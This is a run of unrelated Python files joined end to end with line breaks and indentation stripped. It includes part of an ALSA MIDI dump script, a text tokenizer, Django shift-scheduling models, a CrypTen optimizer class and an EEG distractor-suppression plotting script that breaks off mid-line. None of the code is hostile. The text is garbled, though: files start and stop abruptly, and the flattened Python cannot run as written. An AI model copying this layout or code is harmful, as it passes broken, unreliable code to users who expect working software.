prompt_config.in_template = 'In <\\#>: ' prompt_config.in2_template = ' .\\D.: ' prompt_config.out_template = 'Out<\\#>: ' ipython_kwargs = dict(config=cfg, banner1='') except ImportError: pass parser = argparse.ArgumentParser( description='Dump incoming MIDI events to stdout.' ) parser.add_argument('-n', '--client-name', type=str, dest='client_name', default='mididump', help='ALSA sequencer client name') parser.add_argument('-p', '--port-name', type=str, dest='port_name', default='out_0', help='ALSA sequencer port name') args = parser.parse_args() def handler(signum, frame): print('\nTerminating on signal ', signum) exit(0) #raise KeyboardInterrupt #print('Ctrl+Z pressed, but ignored') signal.signal(signal.SIGTSTP, handler) # Ctrl+C signal.signal(signal.SIGINT, handler) # Ctrl+D try: IPython.embed(**ipython_kwargs) except: pass try: mxmidi.open(args.client_name, args.port_name) mxmidi.connect('mxmd:0') except mxmidi.AlsaSequencerError as e: print(str(e)) exit(1) def thread_beat(): while True: mxmidi.send(9, 'note', 36, 32) time.sleep(2) mxmidi.send(9, 'note', 36, 0) t = threading.Thread(target=thread_beat) t.start() ''' def wait_loop(): while True: data = mxmidi.wait_for_event() print('Event: ', data) ''' def event_handler(*args, **kwargs): print('args: ', args, 'kwargs: ', kwargs) if args[1] == 'cc' and args[2] == 123: # Panic CC raise KeyboardInterrupt return True mxmidi.set_event_handler(event_handler) mxmidi.listen() while True: pass pos_ngrams/preprocessing/tokenizer.py0 #!/usr/bin/env python """Functions for tokenizing data, the below can be updated to account for new lines without spaces, or contiguous non-English languages""" import shlex from nltk.tokenize import sent_tokenize __author__ = "" __python_version__ = "3.6" def tokenizer_word(text_string, keep_phrases=False): """ Tokenizer that tokenizes a string of text on spaces and new lines (regardless of however many of each.) :param text_string: Python string object to be tokenized. :param keep_phrases: Booalean will not split "quoted" text :return: Array of strings, each is a word """ text_string = str(text_string) if keep_phrases: tokens = shlex.split(text_string.replace('\n', ' ').replace('/', ' ')) else: tokens = text_string.replace('\n', ' ').replace('/', ' ').split() return tokens def tokenizer_sentence(text_string): """ Tokenizer that tokenizes a string of text into sentences :param text_string: Python string object to be tokenized. :return: Array of strings, each is a sentence """ sent_tokenize_list = sent_tokenize(text_string) return sent_tokenize_list def tokenizer_pos(pos_tuplets): """ Tokenizer that tokenizes a list of part of speech tuplets into array of tokens for each word, and an array for each tag :param pos_tuplets: List of pos tuplets :return: tokens, list of word tokens; tokens_tags, list of pos tags """ tokens = [] tokens_tags = [] for tup in pos_tuplets: tokens.append(tup[0]) tokens_tags.append(tup[1]) return tokens, tokens_tags def de_tokenizer_pos(tokens, tokens_tags, tokens_original): """ Rezips the 2 tokenized lists of the tokenizer_pos into a list of pos tuples :param tokens: List of str, word tokens :param tokens_tags: List of str, pos tags :param tokens_original: List of str, the original tokens as generated by tokenizer_pos :return: pos_tuplets, List of pos tuplets """ tokens = [x if x in tokens else None for x in tokens_original] pos_tuplets = [(x, y) for x, y in zip(tokens, tokens_tags) if x is not None] return pos_tuplets """Module for build/compile interception """ from .clang import build_main, compile_main __all__ = ['build_main', 'compile_main'] import calendar import datetime from django.db.models import Q, Sum from django.db.models.signals import post_save from django.dispatch import receiver from model_utils.models import SoftDeletableModel, TimeStampedModel from schedule.settings import MEDIA_URL from django.contrib.auth.models import User, Permission from django.db import models from django.utils.translation import ugettext_lazy as _ from django.utils.encoding import smart_str def get_path_avatar(instance, filename): return "upload/{0}/avatar/{1}".format(instance.id, smart_str(filename)) class Profession(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=200) abbreviation = models.CharField(max_length=10) class Meta: verbose_name = _("Profession") verbose_name_plural = _("Professions") def __str__(self): return self.name class Profile(TimeStampedModel, SoftDeletableModel): user = models.OneToOneField(User, blank=True, null=True, on_delete=models.CASCADE) phone = models.CharField(max_length=15, blank=True, null=True) color = models.CharField(max_length=7, blank=True, null=True) admin = models.NullBooleanField() avatar = models.FileField(blank=True, null=True, upload_to=get_path_avatar) profession = models.ForeignKey(Profession, blank=True, null=True, on_delete=models.SET_NULL) class Meta: verbose_name = _("Profile") verbose_name_plural = _("Profiles") def __str__(self): if self.user and self.user.first_name: if self.profession: return self.profession.abbreviation + ' ' + self.user.first_name else: return self.user.first_name else: return str(self.id) def get_time_after_today(self,today): day = datetime.datetime.now().day last_day = calendar.monthrange(today.year,today.month)[1] hours_next = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=last_day, date__day__gte=day, is_removed=False).distinct().aggregate( Sum('duration_hours'),Sum('duration_minutes')) return hours_next def get_time_before_today(self, today): day = today.day hours_before = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=day, date__day__gte=1, is_removed=False).distinct().aggregate( Sum('duration_hours'),Sum('duration_minutes')) return hours_before def get_time_per_month(self, today): events_hours = self.event_set.filter(date__month=today.month, date__year=today.year, is_removed=False).distinct().aggregate( Sum('duration_hours'),Sum('duration_minutes')) return events_hours def get_time_after_today_per_turn(self,today): day = datetime.datetime.now().day last_day = calendar.monthrange(today.year,today.month)[1] hours_next = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=last_day, date__day__gte=day, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return hours_next def get_time_before_today_per_turn(self, today): day = today.day hours_before = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=day, date__day__gte=1, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return hours_before def get_time_per_month_per_turn(self, today): events_hours = self.event_set.filter(date__month=today.month, date__year=today.year, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return events_hours @property def get_avatar(self): if not self.avatar: return '/static/app/img/no_user.jpg' else: return MEDIA_URL + str(self.avatar) @receiver(post_save, sender=User) def create_user_profile(sender, instance, created, **kwargs): if created: profile = Profile.objects.create(user=instance) # can_dashboard = Permission.objects.get(codename='can_dashboard') # can_inbox = Permission.objects.get(codename='can_inbox') # profile.user.user_permissions.add(can_dashboard) # profile.user.user_permissions.add(can_inbox) class Hour(TimeStampedModel, SoftDeletableModel): start_time = models.TimeField() end_time = models.TimeField(blank=True, null=True) class Meta: verbose_name = _("Hour") verbose_name_plural = _("Hours") def __str__(self): return str(self.start_time) @property def as_dict(self): return { 'start_time': self.start_time, 'end_time': self.end_time } @property def get_amount_time(self): if self.end_time: end = datetime.timedelta(hours=self.end_time.hour, minutes=self.end_time.minute) start = datetime.timedelta(hours=self.start_time.hour, minutes=self.start_time.minute) return end - start else: return 0 class Turn(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=100) # noche,tarde,manana hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL) duration_hours = models.IntegerField(blank=True, null=True) duration_minutes = models.IntegerField(blank=True, null=True) class Meta: verbose_name = _("Turn") verbose_name_plural = _("Turns") ordering = ['hour__start_time'] def __str__(self): return self.name @property def get_amount_hours(self): return self.duration_hours @property def get_amount_minutes(self): return self.duration_minutes class Status(models.Model): name = models.CharField(max_length=100) # planificado,trabajado class Meta: verbose_name = _("Status") verbose_name_plural = _("Statuses") def __str__(self): return self.name class Event(TimeStampedModel, SoftDeletableModel): date = models.DateField() turn = models.ForeignKey(Turn, blank=True, null=True, on_delete=models.SET_NULL) status = models.ForeignKey(Status, on_delete=models.CASCADE, blank=True, null=True) # programed, plaint profile = models.ForeignKey(Profile, on_delete=models.CASCADE) duration_hours = models.IntegerField(blank=True, null=True) duration_minutes = models.IntegerField(blank=True, null=True) class Meta: verbose_name = _("Event") verbose_name_plural = _("Events") def __str__(self): return str(self.date_start) + ' ' + self.profile.user.first_name class Holiday(TimeStampedModel, SoftDeletableModel): day = models.DateField() class Meta: verbose_name = _("Holiday") verbose_name_plural = _("Holidays") def __str__(self): return str(self.day) class NonWorkingDay(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=20) number_day = models.IntegerField() class Meta: verbose_name = _("NonWorkingDay") verbose_name_plural = _("NonWorkingDays") def __str__(self): return self.name class MotiveAffectation(models.Model): name = models.CharField(max_length=150) class Meta: verbose_name = _("MotiveAffectation") verbose_name_plural = _("MotiveAffectations") def __str__(self): return self.name class Affectation(TimeStampedModel, SoftDeletableModel): hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL) motive = models.ForeignKey(MotiveAffectation, blank=True, null=True, on_delete=models.SET_NULL) comment = models.TextField(blank=True, null=True) class Feature(models.Model): menu_item_name = models.CharField(verbose_name=_('Item Name'), max_length=100) url = models.CharField(verbose_name=_('Url'), max_length=100) icon = models.CharField(verbose_name=_('Icon'), max_length=100) position = models.PositiveIntegerField(verbose_name=_('Position'), blank=True, null=True) child = models.ForeignKey('self', related_name='child_feature', on_delete=models.SET_NULL, blank=True, null=True) permission = models.ManyToManyField(Permission) class Meta: verbose_name = _("Feature") verbose_name_plural = _("Features") def __str__(self): return self.menu_item_name crypten/optim/optimizer.py #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import crypten import torch from torch.optim.optimizer import required class Optimizer(torch.optim.Optimizer): r"""Base class for all optimizers. .. warning:: Parameters need to be specified as collections that have a deterministic ordering that is consistent between runs. Examples of objects that don't satisfy those properties are sets and iterators over values of dictionaries. Arguments: params (iterable): an iterable of :class:`torch.Tensor` s, :class:`dict` s, or :class:`crypten.CrypTensor`s. Specifies what Tensors should be optimized. defaults: (dict): a dict containing default values of optimization options (used when a parameter group doesn't specify them). Note: This optimizer is adapted from torch.optim.Optimizer to work with CrypTensors """ def add_param_group(self, param_group): r"""Add a param group to the :class:`Optimizer` s `param_groups`. This can be useful when fine tuning a pre-trained network as frozen layers can be made trainable and added to the :class:`Optimizer` as training progresses. Arguments: param_group (dict): Specifies what Tensors should be optimized along with group specific optimization options. """ assert isinstance(param_group, dict), "param group must be a dict" params = param_group["params"] if isinstance(params, (torch.Tensor, crypten.CrypTensor)): param_group["params"] = [params] elif isinstance(params, set): raise TypeError( "optimizer parameters need to be organized in ordered collections, but " "the ordering of tensors in sets will change between runs. Please use a list instead." ) else: param_group["params"] = list(params) for param in param_group["params"]: if not isinstance(param, (torch.Tensor, crypten.CrypTensor)): raise TypeError( "optimizer can only optimize Tensors, " "but one of the params is " + torch.typename(param) ) for name, default in self.defaults.items(): if default is required and name not in param_group: raise ValueError( "parameter group didn't specify a value of required optimization parameter " + name ) else: param_group.setdefault(name, default) self.param_groups.append(param_group) DockyD/DvMprojects/EEGDistractorSuppression.py import os import sys sys.path.append('/home/dvmoors1/BB/ANALYSIS/DvM') import mne import glob import pickle import matplotlib matplotlib.use('agg') # now it works via ssh connection import numpy as np import scipy as sp import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from stats.nonparametric import * from eeg_analyses.helperFunctions import * from visuals.taskdisplays import * from visuals.visuals import MidpointNormalize from support.support import * from IPython import embed from scipy.stats import pearsonr from matplotlib import cm from mpl_toolkits.mplot3d import Axes3D from itertools import product from scipy.stats import ttest_rel from eeg_analyses.FolderStructure import FolderStructure # set general plotting parameters sns.set(font_scale=2.5) sns.set_style('ticks', {'xtick.major.size': 10, 'ytick.major.size': 10}) class EEGDistractorSuppression(FolderStructure): def __init__(self): pass def repetitionPlot(self, T, D, times, chance = 0, p_val = 0.05): ''' Standard main plots. A 2*2 visualization of the repetition effect. Top two graphs show analysis tuned to the target location. Bottom two graphs show analysis tuned to distractor location. Variable blocks are shown in blue, target repetition is shown in green and distractor repetition is shown in red. ''' # initialize Permutation object PO = Permutation() # nice format for 2x2 subplots plt.figure(figsize = (15,10)) plt_idx = 1 y_lim = (-0.25,0.2) step = ((y_lim[1] - y_lim[0])/70.0) for to_plot in [T,D]: # set plotting colors and legend labels for plot in ['V','R']: # initialize subplot and beatify plots ax = plt.subplot(2,2 , plt_idx) ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=chance, color = 'black') plt.axvline(x= -250, color = 'black') # onset placeholders plt.axvline(x= 0, color = 'black') # onset gabors sns.despine(offset=50, trim = False) plt.ylim(y_lim) if plot == 'V': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'R': if plt_idx > 2: cnds, color = ['DrTv_0','DrTv_3'], 'red' elif plt_idx <= 2: cnds, color = ['DvTr_0','DvTr_3'], 'green' # loop over condititions for i, cnd in enumerate(cnds): err, diff = bootstrap(to_plot[cnd]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = cnd, color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # indicate significant clusters of individual timecourses sig_cl = PO.clusterBasedPermutation(to_plot[cnd], chance, p_val = 0.05) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * i), ls = ['-','--'][i], color = color) sig_cl = PO.clusterBasedPermutation(to_plot[cnds[0]], to_plot[cnds[1]], p_val = 0.01) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 2), color = 'black') sig_cl = PO.clusterBasedPermutation(to_plot[cnds[0]] - to_plot[cnds[1]], to_plot['DvTv_0'] - to_plot['DvTv_3'], p_val = 0.05, cl_p_val = 0.01) print sig_cl mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 3), color = 'grey') plt.legend(loc = 'best') # update plot counter plt_idx += 1 plt.tight_layout() def alphaSlopes(self): ''' Main analysis alpha band as reported in MS. CTF slopes is contrasted using cluster-based permutation in variable and repetition sequences bewteen the first and last repetition. ''' # read in target repetition slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'target', ctf_name = 'cnds_*_slopes_alpha.pickle', fband = 'alpha') T = {} for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']: #T[cnd] = mne.filter.resample(np.vstack([slopes[i][cnd]['E_slopes'] for i in range(len(slopes))]), down = 4) T[cnd] = np.vstack([slopes[i][cnd]['total'] for i in range(len(slopes))]) # read in dist repetition slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'dist', ctf_name = 'cnds_*_slopes_alpha.pickle', fband = 'alpha') D = {} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']: #D[cnd] = mne.filter.resample(np.vstack([slopes[i][cnd]['E_slopes'] for i in range(len(slopes))]), down = 4) D[cnd] = np.vstack([slopes[i][cnd]['total'] for i in range(len(slopes))]) times = np.linspace(-300, 800, 141) - 250 #times = mne.filter.resample(times, down = 2) self.repetitionPlot(T,D, times) plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'alpha-slopes.pdf')) plt.close() def crossTraining(self): ''' Add description if included in MS ''' slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'target', ctf_name = '*_slopes-sub_cross.pickle', fband = 'alpha') plt.figure(figsize = (20,10)) for pl, cnd in enumerate(['DvTr_0','DvTr_3']): ax = plt.subplot(2,2 , pl + 1, title = cnd, ylabel = 'train time (ms)', xlabel = 'test time (ms)') X = np.stack([np.squeeze(slopes[i][cnd]['cross']) for i in range(len(slopes))]) #p_vals = signedRankArray(X, 0) X = np.mean(X, axis = 0) #X[p_vals > 0.05] = 0 plt.imshow(X, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],times[0],times[-1]], vmin = -0.3, vmax = 0.3) plt.colorbar() slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = 'dist', ctf_name = '*_slopes-sub_cross.pickle', fband = 'alpha') for pl, cnd in enumerate(['DrTv_0','DrTv_3']): ax = plt.subplot(2,2 , pl + 3, title = cnd, ylabel = 'train time (ms)', xlabel = 'test time (ms)') X = np.stack([np.squeeze(slopes[i][cnd]['cross']) for i in range(len(slopes))]) #p_vals = signedRankArray(X, 0) X = np.mean(X, axis = 0) #X[p_vals > 0.05] = 0 plt.imshow(X, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],times[0],times[-1]], vmin = -0.3, vmax = 0.3) plt.colorbar() plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'cross-training.pdf')) plt.close() def conditionCheck(self, window = (-0.3,0.8), thresh_bin = 1): ''' Checks the mimimum number of conditions after preprocessing ''' text = '' for sj in [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]: # read in beh with open(self.FolderTracker(extension = ['beh','processed'], filename = 'subject-{}_all.pickle'.format(sj)),'rb') as handle: beh = pickle.load(handle) # read in eeg data EEG = mne.read_epochs(self.FolderTracker(extension = ['processed'], filename = 'subject-{}_all-epo.fif'.format(sj))) # exclude trials contaminated by unstable eye position s, e = [np.argmin(abs(EEG.times - t)) for t in window] nan_idx = np.where(np.isnan(beh['eye_bins'])> 0)[0] heog = EEG._data[:,EEG.ch_names.index('HEOG'),s:e] eye_trials = eog_filt(beh, EEG, heog, sfreq = EEG.info['sfreq'], windowsize = 50, windowstep = 25, threshold = 30) beh['eye_bins'][eye_trials] = 99 # use mask to select conditions and position bins (flip array for nans) eye_mask = ~(beh['eye_bins'] > thresh_bin) # select conditions cnds = beh['condition'][eye_mask] min_cnd, cnd = min([sum(cnds == c) for c in np.unique(cnds)]), np.unique(cnds)[ np.argmin([sum(cnds== c) for c in np.unique(cnds)])] text += 'sj {}, min cnd is {} ({} trials, {}%) \n'.format(sj, cnd, min_cnd, min_cnd/612.0) with open('eye-{}.txt'.format(thresh_bin), 'a') as the_file: the_file.write(text) def inspectTimeCourse(self, plotting_data, times, y_lim = (-7,5), chance = 0, file = ''): ''' Creates general plotting structure. Left plot repetition 1 and 4 in variable condition. Middle plot repetition 1 and 4 in repeat condition. Right plot effect of repetition. Uses unique colors for variable and repetition blocks. Significant parts of the line are set to black. ''' # initialize Permutation object PO = Permutation() # nice format for 2x2 subplots plt.figure(figsize = (15,10)) step = ((y_lim[1] - y_lim[0])/70.0) # loop over variable and repetition plots and D and T blocks T_jasp, D_jasp = np.zeros((24,8)), np.zeros((24,8)) all_data = {'T':{},'D':{}} plt_idx = 1 for analysis in ['T', 'D']: # initialize subplot for plot in ['Var','Rep']: ax = plt.subplot(2,2 , plt_idx) # beautify plots ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=chance, color = 'grey') plt.axvline(x=-0.25, color = 'grey') # onset placeholders plt.axvline(x=0, color = 'grey') # onset gabors plt.ylim(y_lim) # set plotting colors and legend labels if plot == 'Var': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'Rep': if analysis == 'D': cnds, color = ['DrTv_0','DrTv_3'], 'red' elif analysis == 'T': cnds, color = ['DvTr_0','DvTr_3'], 'green' # loop over condititions for i, cnd in enumerate(cnds): all_data[analysis][cnd] = plotting_data[analysis][cnd] err, diff = bootstrap(plotting_data[analysis][cnd]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = '{}'.format(cnd), color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # indicate significant clusters of individual timecourses sig_cl = PO.clusterBasedPermutation(plotting_data[analysis][cnd], chance) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * i), ls = ['-','--'][i], color = color) file.write('{} vs {}: window = {} - {}'.format(cnd, chance, times[cl[0]],times[cl[-1]])) # plot the repetition effect sig_cl = PO.clusterBasedPermutation(all_data[analysis][cnds[1]], all_data[analysis][cnds[0]]) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 2), color = 'black') if cl.size != 0: file.write('repetition effect {}: window = {} - {} \n'.format(analysis, times[cl[0]],times[cl[-1]])) plt_idx += 1 plt.legend(loc = 'best') sns.despine(offset=50, trim = False) # plot the baseline effect (rep 3 - rep 0 vs baseline) sig_cl = PO.clusterBasedPermutation(all_data[analysis][cnds[1]] - all_data[analysis][cnds[0]], all_data[analysis]['DvTv_3'] - all_data[analysis]['DvTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 3), color = 'grey') if cl.size != 0: file.write('repetition effect baseline {}: window = {} - {} \n'.format(analysis, times[cl[0]],times[cl[-1]])) # plot the analysis effect sig_cl = PO.clusterBasedPermutation(all_data['T']['DvTr_0'], all_data['D']['DrTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 4), color = 'yellow') if cl.size != 0: file.write('D vs T rep 1 window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) sig_cl = PO.clusterBasedPermutation(all_data['T']['DvTr_3'], all_data['D']['DrTv_3']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 5), color = 'purple') if cl.size != 0: file.write('D vs T rep 4 window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) sig_cl = PO.clusterBasedPermutation(all_data['T']['DvTr_3'] - all_data['T']['DvTr_0'], all_data['D']['DrTv_3'] - all_data['D']['DrTv_0']) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (y_lim[0] + step * 6), color = 'brown') if cl.size != 0: file.write('D vs T repetition effect window = {} - {} \n'.format(times[cl[0]],times[cl[-1]])) file.close() plt.tight_layout() def inspectTimeCourseSEP(self, header, plotting_data, times, y_lim = (-7,5), chance = 0, analysis = ''): ''' Creates general plotting structure. Left plot repetition 1 and 4 in variable condition. Middle plot repetition 1 and 4 in repeat condition. Right plot effect of repetition. Uses unique colors for variable and repetition blocks. Significant parts of the line are set to black. ''' # initialize Permutation object PO = Permutation() # get height permutation bar h = (abs(y_lim[0] - y_lim[1]))/40.0/2 if header == 'target': rep_cnds = ['DvTr_0','DvTr_3'] rep_color = 'green' elif header == 'dist': rep_cnds = ['DrTv_0','DrTv_3'] rep_color = 'red' # loop over variable and repetition plots all_data = [] for idx, plot in enumerate(['Var','Rep']): # initialize plot #ax = plt.subplot(1,3 , idx + 1 ) #, title = plot, ylabel = 'mV') plt.figure(figsize = (15,5)) #ax = plt.subplot(1,1 , 1, xlabel = 'Time (ms)') #, title = plot, ylabel = 'mV') # beautify plots plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=chance, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.ylim(y_lim) plt.xlim((times[0],times[-1])) # set plotting colors and legend labels if plot == 'Var': cnds, color = ['DvTv_0','DvTv_3'], 'blue' elif plot == 'Rep': cnds, color = rep_cnds, rep_color # loop over condititions for i, cnd in enumerate(cnds): all_data.append(plotting_data[cnd]) err, diff = bootstrap(all_data[-1]) # plot timecourse with bootstrapped error bar plt.plot(times, diff, label = '{}'.format(cnd), color = color, ls = ['-','--'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = color) # change parts of line that are significant sig_cl = PO.clusterBasedPermutation(all_data[-1], chance) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for cl in sig_cl: plt.plot(times[cl], np.ones(cl.size) * (0.08 + 0.01 * i), ls = ['-','--'][i], color = color) # add markers for significant clusters (condition repetition effect) sig_cl = PO.clusterBasedPermutation(all_data[-2], all_data[-1]) plt.fill_between(times, chance - 0.25, chance + 0.25, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker([analysis,'MS-plots'], filename = '{}-{}.pdf'.format(header,plot))) # Compare variable and repetition plots (rep 1 - rep 4) plt.figure(figsize = (15,5)) ax = plt.subplot(1,1 ,1) #, title = 'Difference', ylabel = 'mV') # beatify plot plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') var = all_data[0] - all_data[1] rep = all_data[2] - all_data[3] for i, signal in enumerate([var, rep]): err, diff = bootstrap(signal) plt.plot(times, diff, label = ['var','rep'][i], color = ['blue', rep_color][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color =['blue', rep_color][i]) sig_cl = PO.clusterBasedPermutation(var, rep) # set new height permutation bar y_lim = ax.get_ylim() h = (abs(y_lim[0] - y_lim[1]))/40.0/2 plt.xlim((times[0],times[-1])) plt.fill_between(times, -h, h, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker([analysis,'MS-plots'], filename = '{}-plotdiff.pdf'.format(header))) ### DT comparison def DT(self): # initialize Permutation object PO = Permutation() embed() # read in target slopes slopes_t, info, times = self.ctfReader(sj_id = 'all',channels = 'all_channels_no-eye', header = 'target', cnd_name = 'cnds', ctf_name = 'slopes_alpha') slopes_d, info, times = self.ctfReader(sj_id = 'all',channels = 'all_channels_no-eye', header = 'dist', cnd_name = 'cnds', ctf_name = 'slopes_alpha') power = 'total' t_effect = np.vstack([slopes_t[i]['DvTr_3'][power] for i in range(len(slopes_t))]) #- np.vstack([slopes_t[i]['DvTr_3'][power] for i in range(len(slopes_t))]) d_effect = np.vstack([slopes_d[i]['DrTv_3'][power] for i in range(len(slopes_d))]) #- np.vstack([slopes_d[i]['DrTv_3'][power] for i in range(len(slopes_d))]) sig_cl = PO.clusterBasedPermutation(t_effect, d_effect) plt.figure(figsize = (15,5)) plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.xlim((times[0],times[-1])) plt.plot(times, t_effect.mean(0), label = 't_effect') err, diff = bootstrap(t_effect) plt.fill_between(times, diff + err, diff - err, alpha = 0.2) plt.plot(times, d_effect.mean(0), label = 'd_effect') err, diff = bootstrap(d_effect) plt.fill_between(times, diff + err, diff - err, alpha = 0.2) plt.fill_between(times, -0.05, 0.05, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = 'DTdiff.pdf')) plt.close() # read in decoding files = glob.glob(self.FolderTracker(['bdm', 'target_loc'], filename = 'class_*_perm-False.pickle')) bdmT = [] for file in files: with open(file ,'rb') as handle: bdmT.append(pickle.load(handle)) files = glob.glob(self.FolderTracker(['bdm', 'dist_loc'], filename = 'class_*_perm-False.pickle')) bdmD = [] for file in files: with open(file ,'rb') as handle: bdmD.append(pickle.load(handle)) T = np.stack([np.diag(bdmT[j]['DvTr_3']['standard']) for j in range(len(bdmT))]) D = np.stack([np.diag(bdmD[j]['DrTv_3']['standard']) for j in range(len(bdmD))]) sig_cl = PO.clusterBasedPermutation(D, T) # read in ERP erps_T, info, times = self.erpReader('target', 'lat-down1') erps_D, info, times = self.erpReader('target', 'lat-down1') elecs = ['PO7','PO3','O1'] e_idx = np.array([erps_T[erps_T.keys()[0]]['all']['elec'][0].index(e) for e in elecs]) ipsi = np.vstack([erps_T[str(key)]['DvTr_3']['ipsi'][e_idx].mean(0) for key in erps_T.keys()]) contra = np.vstack([erps_T[str(key)]['DvTr_3']['contra'][e_idx].mean(0) for key in erps_T.keys()]) T = contra - ipsi ipsi = np.vstack([erps_D[str(key)]['DrTv_3']['ipsi'][e_idx].mean(0) for key in erps_D.keys()]) contra = np.vstack([erps_D[str(key)]['DrTv_3']['contra'][e_idx].mean(0) for key in erps_D.keys()]) D = contra - ipsi sig_cl = PO.clusterBasedPermutation(D, T) plt.figure(figsize = (15,5)) #ax = plt.subplot(1,1 , 1, xlabel = 'Time (ms)') #, title = plot, ylabel = 'mV') # beautify plots plt.tick_params(axis = 'both', direction = 'out') plt.xlabel('Time (ms)') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.xlim((times[0],times[-1])) plt.fill_between(times, -1, -2, where = sig_cl < 1, color = 'black') plt.savefig(self.FolderTracker(['poster', 'erp'], filename = 'DTdiff.pdf')) plt.close() def diff_ERPS(self, elecs, erp_name, y_lim = (-5,2)): ''' plots ERP difference waves (contra - ipsi) for the repeat and the variable sequences seperately. Calls inspectTimeCourse to visualize the condition comparisons and plot the significant clusters. Arguments - - - - - elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # open file to store timing of significant clusters f = open(self.FolderTracker(['erp','MS-plots'], filename = 'main_erp-{}.txt'.format(erp_name)),'w') # read in data and shift timing embed() T_erps, info, times = self.erpReader('target', erp_name) D_erps, info, times = self.erpReader('dist', erp_name) # get indices of electrodes of interest e_idx = 